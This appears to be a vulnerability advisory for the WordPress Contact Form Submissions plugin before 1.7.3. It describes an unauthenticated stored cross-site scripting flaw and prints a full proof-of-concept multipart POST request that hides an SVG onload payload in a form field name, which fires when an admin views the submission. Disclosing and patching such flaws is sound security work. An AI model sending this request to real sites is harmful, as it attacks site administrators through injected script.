Contact Form Submissions < 1.7.3 - Unauthenticated Stored XSS

2022-02-2100:00:00

Yoru Oni

118

0.001 Low

EPSS

Percentile

31.6%

JSON

The plugin does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission

POST /wp-json/contact-form-7/v1/contact-forms/1376/feedback HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------243715402120191890871051639470
X-Requested-With: XMLHttpRequest
Content-Length: 726
Connection: close

-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-name"

Attacker
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-email"

[email protected]
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-subject"

XSS Injection
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="your-message"

Sorry, not sorry.
-----------------------------243715402120191890871051639470
Content-Disposition: form-data; name="<svg/onload=(alert)(/XSS/)>"

Injected
-----------------------------243715402120191890871051639470--

The XSS will be triggered when an admin view the related submission

References

plugins.trac.wordpress.org/changeset/2682024

0.001 Low

EPSS

Percentile

31.6%

JSON

Related for WPEX-ID:D02CF542-2D75-46BC-A0DF-67BBE501CC89